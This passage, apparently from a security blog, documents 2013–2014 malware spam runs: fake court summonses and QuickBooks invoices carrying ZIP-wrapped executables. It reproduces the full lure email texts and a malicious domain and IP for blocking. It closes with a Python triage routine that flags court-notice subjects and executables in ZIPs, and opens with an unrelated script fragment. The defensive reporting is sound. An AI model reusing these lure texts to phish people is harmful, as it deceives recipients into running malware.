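            result["mismatched"].append(str(src))
    return result


if __name__ == "__main__":
    # Assumed drive letters: the system disk and an external (offline) drive.
    print(salvage(Path(r"C:\windows.old"), Path(r"E:\xp-salvage")))
```

Run it once before starting the 8.1 download, then disconnect the backup drive; a non-empty "mismatched" list means the copy is not yet safe to rely on.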


Friday 27 December 2013

Odd "Wire transfer to your account" spam

Almost all spam tends to be some sort of scam or some sort of malware. I can't quite figure this one out though.

From:     Andrew Chukwu [andrewchukw@gmail.com]
Date:     27 December 2013 13:24
Subject:     Wire transfer to your account

Please review and follow the instruction to get your payment slip,
please get back to us as soon as you get it

Best of Luck

I know better than to open unsolicited .DOC files, so I put it through VirusTotal.. and it came out clean. Joe Sandbox, Malwr, and Malware Tracker all report it as clean too. In fact, the only thing it seems to contain is the following string:
file:///C:/DOCUME~1/AGV/LOCALS~1/Temp/New%20Invoice.htm
The metadata says:

Os: Windows
Version 5.1
Code page: 1252
Author: AGV
Template: Normal
Last Saved By: AGV
Revision Number: 1
Name of Creating Application: Microsoft Office Word
Total Editing Time: 01:00
Create Time/Date: Thu Dec 26 10:15:00 2013
Last Saved Time/Date: Thu Dec 26 10:16:00 2013
Number of Pages: 1
Number of Words: 8
Number of Characters: 48
Security: 0

The email originates from a Gmail IP address, and given the Nigerian-sounding name it could simply be a scam email gone wrong, but I would strongly advise you not to open it in any case, just in case it is something far more malicious.

Monday 23 December 2013

"Hearing of your case in Court NR#6976" spam

I've had quite a few spams with a similar payload to this that I can't even unzip. Go figure. But this one is an interesting variation.

Date:      Mon, 23 Dec 2013 10:05:38 -0500 [10:05:38 EST]
From:      Notice to Appear [support.6@jonesday.com]
Subject:      Hearing of your case in Court NR#6976

 Notice to Appear,
   Hereby you are notified that you have been scheduled to appear for
   your hearing that
   will take place in the court of Washington in January 9, 2014 at 10:00
   am.
   Please bring all documents and witnesses relating to this case with
   you to Court on your hearing date.
   The copy of the court notice is attached to this letter.
   Please, read it thoroughly.
   Note: If you do not attend the hearing the judge may hear the case in
   your absence.
   Yours truly,
   Alison Smith
   Clerk to the Court. 
There is an attachment Court_Notice_Jones_Day_Wa#8127.zip which in turn contains an executable Court_Notice_Jones_Day_Washington.exe which is presumably malicious, but I can't analyse it. The VirusTotal detection rate for the ZIP is 4/49.

Updated: a couple of other variants.. and the ISC have a report now too.

Date:      Mon, 23 Dec 2013 20:02:52 -0400 [19:02:52 EST]
From:      Notice to Appear [ticket_support.6@jonesday.com]
Subject:      Hearing of your case in Court NR#2682

 Notice to Appear,
   Hereby you are notified that you have been scheduled to appear for
   your hearing that
   will take place in the court of Washington in January 15, 2014 at
   09:00 am.
   Please bring all documents and witnesses relating to this case with
   you to Court on your hearing date.
   The copy of the court notice is attached to this letter.
   Please, read it thoroughly.
   Note: If you do not attend the hearing the judge may hear the case in
   your absence.
   Yours truly,
   Olivia Tailor
   Clerk to the Court.

--------------

Date:      Mon, 23 Dec 2013 11:21:46 -0700 [13:21:46 EST]
From:      Notice to Appear [ticket_support.8@jonesday.com]
Subject:      Notice of appearance in court NR#5365

 Notice to Appear,
   Hereby you are notified that you have been scheduled to appear for
   your hearing that
   will take place in the court of Washington in January 19, 2014 at
   09:00 am.
   Please bring all documents and witnesses relating to this case with
   you to Court on your hearing date.
   The copy of the court notice is attached to this letter.
   Please, read it thoroughly.
   Note: If you do not attend the hearing the judge may hear the case in
   your absence.
   Yours truly,
   Jennifer Tailor
   Clerk to the Court.
--------------

Date:      Mon, 23 Dec 2013 21:37:10 -0700 [12/23/13 23:37:10 EST]
From:      Notice to Appear [ticket_support.8@jonesday.com]
Subject:      Urgent court notice NR#31620

Notice to Appear,
   Hereby you are notified that you have been scheduled to appear for
   your hearing that
   will take place in the court of Washington in January 11, 2014 at
   11:00 am.
   Please bring all documents and witnesses relating to this case with
   you to Court on your hearing date.
   The copy of the court notice is attached to this letter.
   Please, read it thoroughly.
   Note: If you do not attend the hearing the judge may hear the case in
   your absence.
   Yours truly,
   Barbara Smith
   Clerk to the Court. 

Update 2 [31/12/2013]  in the past couple of days there has been a renewed spam run with some slightly different details. For some reason I cannot analyse the contents of the ZIP file, but you can be sure that it is malicious.

Sample emails:

Date:      Tue, 31 Dec 2013 06:45:59 -0700 [08:45:59 EST]
From:      Notice to Appear [support.7@lw.com]
Subject:      Urgent court notice No#14110

 Notice of appearance,
   Hereby you are informed that you are due in the court of New York
   on the 19 of January, 2014 at 10:00 am for the hearing of your case.
   You are kindly asked to prepare and bring the documents relating to
   the case to Court on the specified date.
   Please, download the copy of the court notice attached herewith to
   read the details.
   Note: The case may be heard by the judge in your absence if you do not
   come.
   Yours truly,
   Clark Murphy
   Clerk to the Court.

============================

Date:      Mon, 30 Dec 2013 17:03:29 -0400 [12/30/13 16:03:29 EST]
From:      Notice to Appear [aa.support933@jonesday.com]
Subject:      Notice of appearance in court NR#4723

 Notice to Appear,
   Hereby you are notified that you have been scheduled to appear for
   your hearing that
   will take place in the court of Washington in January 17, 2014 at
   10:00 am.
   Please bring all documents and witnesses relating to this case with
   you to Court on your hearing date.
   The copy of the court notice is attached to this letter.
   Please, read it thoroughly.
   Note: If you do not attend the hearing the judge may hear the case in
   your absence.
   Yours truly,
   Evie Mason
   Clerk to the Court.

============================

Date:      Mon, 30 Dec 2013 13:05:54 -0600 [12/30/13 14:05:54 EST]
From:      Notice to Appear [order.040@gibsondunn.com]
Subject:      Hearing of your case in Court No7712

 Notice to Appear in Court,
   This is to advise that you are required to attend
   the court of Los Angeles in January 11, 2014 for the hearing of your
   case.
   Please, kindly prepare and bring the documents related to this case to
   Court on the date mentioned above.
   Attendance is compulsory.
   The copy of the court notice is attached to this letter, please,
   download and read it thoroughly.
   ALLEN Walsh
   Clerk to the Court.

Sample attachments:
Court_Notice_Latham_and_Watkins__NY07550.zip
Court_Notice_Jones_Day_Wa#6152.zip
Court_Notice_Los_Angeles_No0216.zip

Update 3: [8/1/2014] another slight variation of this has gone out in the past day or so..

Date:      Mon, 06 Jan 2014 18:12:16 -0400 [01/06/14 17:12:16 EST]
From:      Court attendance notification [help151@perkinscoie.com]
Subject:      Court attendance notification #No597

 Pretrial notice,
   Hereby we inform that you are obliged to come as a defendant
   to The Court of Louisiana in February 23, 2014 at 10:30 a.m.
   for the hearing of your case of illegal software use.
   If necessary you have a right to obtain a lawyer for your protection.
   You are kindly asked to have an identity document with you.
   Personal appearance is compulsory.
   Please find the plaint note with more detailed case information
   attached to this letter and study it thoroughly.
   Court clerk,
   Donna Tailor

============================

Date:      Tue, 07 Jan 2014 10:56:43 -0500 [01/07/14 10:56:43 EST]
From:      Pretrial Notice [notice_support.6@alston.com]
Subject:      Judicial summons No8365

 Pretrial notice,
   Hereby we inform that you are obliged to come as a defendant
   to The Court of Atlanta in February 19, 2014 at 10:00 a.m.
   for the hearing of your case of illegal software use.
   If necessary you have a right to obtain a lawyer for your protection.
   You are kindly asked to have an identity document with you.
   Personal appearance is compulsory.
   Please find the plaint note with more detailed case information
   attached to this letter and study it thoroughly.
   Court clerk,
   Karen Mason

============================

Date:      Tue, 07 Jan 2014 A.D. 18:33:05 -0400 [01/07/14 17:33:05 EST]
From:      Pretrial Notice [support.3@alston.com]
Subject:      Judicial summons No3877

 Pretrial notice,
   Hereby we inform that you are obliged to come as a defendant
   to The Court of Atlanta in February 20, 2014 at 10:00 a.m.
   for the hearing of your case of illegal software use.
   If necessary you have a right to obtain a lawyer for your protection.
   You are kindly asked to have an identity document with you.
   Personal appearance is compulsory.
   Please find the plaint note with more detailed case information
   attached to this letter and study it thoroughly.
   Court clerk,
   Mary Smith

============================

Date:      Wed, 08 Jan 2014 02:54:03 -0500 [02:54:03 EST]
From:      Pretrial Notice [notice_support.8@alston.com]
Subject:      Notice of appearance in court No96162

 Pretrial notice,
   Hereby we inform that you are obliged to come as a defendant
   to The Court of Atlanta in February 12, 2014 at 09:00 a.m.
   for the hearing of your case of illegal software use.
   If necessary you have a right to obtain a lawyer for your protection.
   You are kindly asked to have an identity document with you.
   Personal appearance is compulsory.
   Please find the plaint note with more detailed case information
   attached to this letter and study it thoroughly.
   Court clerk,
   Alison Tailor

Sample attachment names:
Plaint_Note_Document_06_01#0478.zip
Plaint Note_06_01_2014_No2964.zip
Plaint_Note_Document_06_01#1619.zip
Plaint_Note_Document_06_01#6017.zip

This malware is detected by 28/48 scanners at VirusTotal, but the Malwr analysis of what it does seems pretty inconclusive.

QuickBooks spam / Invoice.zip

This fake QuickBooks spam has a malicious attachment:

Date:      Mon, 23 Dec 2013 07:54:35 -0800 [10:54:35 EST]
From:      QuickBooks Invoice [auto-invoice@quickbooks.com]
Subject:      Important - Payment Overdue

Please find attached your invoices for the past months. Remit the payment by 12/23/2013 as outlines under our "Payment Terms" agreement.

Thank you for your business,

Sincerely,
Randal Owen

This e-mail has been sent from an automated system.  PLEASE DO NOT REPLY.

The information contained in this message may be privileged, confidential and protected from disclosure. If the reader of this message is not the intended recipient, or an employee or agent responsible for delivering this message to the intended recipient, you are hereby notified that any dissemination, distribution or copying of this communication is strictly prohibited. If you have received this communication in error, please notify your representative immediately and delete this message from your computer. Thank you. 

Attached to the message is a file Invoice.zip which has a VirusTotal detection rate of 5/44, which in turn contains a malicious executable Invoice.exe with a detection rate of 5/49.

Automated analysis [1] [2] [3] shows an attempted connection to wifordgallery.com on 174.127.73.250 (Hosting Services Inc, US). It appears to be the only domain on that server, so blocking the IP or the domain itself may give you some protection against this current run of malware.
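Both the "Notice to Appear" run above and this QuickBooks run share the same shape: a lookalike sender, a subject built around a fake reference number, and a ZIP attachment wrapping an EXE. As an added example (not the blog's own code), this Python triage routine parses a message and reports those traits; the sample message is constructed inline with a harmless stub in place of the real attachment, and the subject regex and extension list are this example's assumptions, not a published signature.

```python
import io
import re
import zipfile
from email import policy
from email.message import EmailMessage
from email.parser import BytesParser

EXEC_EXTENSIONS = (".exe", ".scr", ".com", ".pif", ".bat", ".cmd", ".js", ".vbs")
# Subject shapes seen in the run: "... Court NR#6976", "Judicial summons No8365"
COURT_SUBJECT = re.compile(
    r"\b(?:court|summons|appearance|hearing)\b.*\b(?:NR|No)#?\d+", re.I)


def build_sample_message() -> bytes:
    """Constructed lookalike of the spam; the ZIP member is a harmless stub."""
    zbuf = io.BytesIO()
    with zipfile.ZipFile(zbuf, "w") as z:
        z.writestr("Court_Notice_Jones_Day_Washington.exe", b"MZ stub, not a PE")
    msg = EmailMessage()
    msg["From"] = "Notice to Appear <support.6@jonesday.com>"
    msg["Subject"] = "Hearing of your case in Court NR#6976"
    msg.set_content("The copy of the court notice is attached to this letter.")
    msg.add_attachment(zbuf.getvalue(), maintype="application", subtype="zip",
                       filename="Court_Notice_Jones_Day_Wa#8127.zip")
    return msg.as_bytes()


def triage(raw: bytes) -> list:
    """Return the reasons a message matches this campaign (empty list = no hit)."""
    msg = BytesParser(policy=policy.default).parsebytes(raw)
    reasons = []
    if COURT_SUBJECT.search(str(msg["Subject"] or "")):
        reasons.append("subject matches court-notice pattern")
    for part in msg.iter_attachments():
        name = (part.get_filename() or "").lower()
        payload = part.get_payload(decode=True) or b""
        if not name.endswith(".zip") or not zipfile.is_zipfile(io.BytesIO(payload)):
            continue
        with zipfile.ZipFile(io.BytesIO(payload)) as z:
            for info in z.infolist():
                with z.open(info) as member:
                    head = member.read(2)  # PE files start with the "MZ" magic
                if info.filename.lower().endswith(EXEC_EXTENSIONS):
                    reasons.append(f"ZIP contains executable: {info.filename}")
                elif head == b"MZ":
                    reasons.append(f"ZIP member is a PE despite its name: {info.filename}")
    return reasons
```

Feed triage() the raw bytes of a quarantined message; it reads the ZIP members without extracting them to disk, which is the point of the check.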